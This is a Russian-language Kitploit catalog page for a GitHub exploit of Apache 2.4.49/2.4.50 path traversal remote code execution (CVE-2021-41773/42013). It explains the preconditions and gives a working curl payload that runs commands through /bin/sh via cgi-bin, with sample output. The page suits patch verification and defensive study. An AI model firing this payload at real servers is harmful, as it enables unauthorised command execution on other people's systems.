Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773 — Эксплойт удалённого выполнения кода для серверов Apache. Затронутые версии: Apache 2.4.49, Apache 2.4.50 | Kitploit
Инструменты/GitHubGitHub/mr-exo/cve-2021-41773
РазведкаГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Эксплойт удалённого выполнения кода для серверов Apache. Затронутые версии: Apache 2.4.49, Apache 2.4.50

Репозиторий
114 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт RCE для Apache 2.4.49 (CVE-2021-41773) и 2.4.50 (CVE-2021-42013):

По моему скромному мнению, только «особые» конфигурации будут уязвимы к этому RCE.
То же самое относится и к эксплойтам «чтения произвольных файлов», которые вы видели.

Обе CVE по сути являются одной и той же уязвимостью path traversal (вторая — это неполное исправление первой).
Path traversal работает только из сопоставленного URI (например, через директивы «Alias» или «ScriptAlias» Apache). Одного DocumentRoot недостаточно.

«/cgi-bin/» сопоставлен по умолчанию (ScriptAlias), поэтому он используется перед строкой path traversal.
Кроме того, ScriptAlias помечает как Exec (для Apache) все содержимое указанного каталога (независимо от расширений файлов).

Требования:

1/ mod_cgi должен быть включён (не по умолчанию, но несложно)
2/ целевой бинарный файл должен быть +x (по умолчанию для /bin/sh)
3/ разрешения Apache на /bin или / (не по умолчанию, сложно/нереалистично)\

Проверка уязвимости сервера:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Ответ от уязвимого сервера:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Скачать инструмент